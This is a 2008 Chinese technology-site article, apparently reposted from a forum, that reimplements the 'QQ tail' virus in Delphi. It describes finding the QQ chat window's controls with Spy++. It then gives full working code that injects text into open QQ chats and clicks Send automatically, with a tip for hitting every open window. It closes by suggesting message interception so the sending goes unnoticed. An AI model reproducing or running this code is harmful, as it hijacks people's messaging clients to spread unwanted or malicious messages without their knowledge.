科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道QQ尾巴病毒的另一种实现

QQ尾巴病毒的另一种实现

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

前几天看到 wuqiu 兄 把 QQ尾巴病毒模拟了一遍,我觉得通过查找窗体标题,不太合常理,回去用SPY++来查看了一下,原来,QQ的框架是这样的。

作者:zdnet安全频道 来源:论坛整理 2008年7月23日

关键字: 腾讯 病毒 QQ尾巴 QQ

  • 评论
  • 分享微博
  • 分享邮件

前几天看到 wuqiu 兄 把 QQ尾巴病毒模拟了一遍,

我觉得通过查找窗体标题,不太合常理

回去用SPY++来查看了一下,原来,QQ的框架是这样的

QQ尾巴病毒的另一种实现(图一)

其中,#32770(对话框)就是弹出的QQ聊天界面;内部的控件就如上图显示的那样,有Static(标签)、Button(按钮)、AfxWnd42(这个我猜类似panel的容器)、RICHEDIT(这里面就是显示我们的聊天纪录了)

具体的布局就不一一的细说了,你们可以自己打开SPY++看看,一目了然

其中,我们用到的只是其中两个控件,如下图:

QQ尾巴病毒的另一种实现(图二)

QQ尾巴病毒的另一种实现(图三)

前半部分是句柄,中间是标题,后半部分是类名

如:05240258~发送(&S)~Button

就是发送按钮,句柄是05240258

好了,知道了这些,想做点什么就很简单了

全部代码如下:

Procedure TForm1.Timer1Timer(Sender: TObject);
Var
   hMemo, hRichEdit, HWindow, HButton: THandle; //句柄变量
   szText           : Array[0..255] Of char;   //得到的字符串
   MyText           : String;  //发送的字符串
Begin
   HWindow := 0;//从零开始,即从第一个字窗体开始遍历查找

   While true Do
      Begin

         //找是#32770(对话框)的窗体
         HWindow := FindWindowEx(0, HWindow, '#32770', Nil);
         If HWindow <> 0 Then
            Begin

              //找是AfxWnd42(这个我猜类似panel的容器)的窗体
               hMemo := FindWindowEx(HWindow, 0, 'AfxWnd42', Nil);
               If hMemo <> 0 Then
                  Begin

                    //找是RICHEDIT的窗体
                     hRichEdit := FindWindowEx(hMemo, 0, 'RichEdit', Nil);
                     If hRichEdit <> 0 Then
                        Begin

                         //想些什么随便啦,嘿嘿
                           MyText := '           阿德是个大帅哥,嘿嘿';

                          //发消息,得到QQ中的文本
                           SendMessage(hRichEdit, WM_GetTEXT, 256,
                              integer(@szText[0]));

                          //加上自己的话
                           MyText := szText + MyText;

                          //再发给QQ
                           SendMessage(hRichEdit, WM_SETTEXT, 256,
                              integer(MyText));

                          //找到发送按钮
                           HButton := FindWindowEx(HWindow, 0, 'Button',
                              '发送(&S)');

                          //发点击消息,发送
                           SendMessage(HButton, BM_CLICK, 0, 0);

                          //退出,如果去掉这句,就是给所有打开的QQ窗体发

                          //否则,只发给最前面的QQ窗体
                           break;
                        End;
                  End;
            End;
      End;
End;

这也只是对QQ尾巴的一种猜测,程序有很多不尽如人意的地方,比如发的文本在QQ中显示一下然后再发送,就如 wuqiu 兄 的文章里说的,只要对消息进行拦截,然后再背地里偷偷的发送,就会神不知鬼不觉了

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章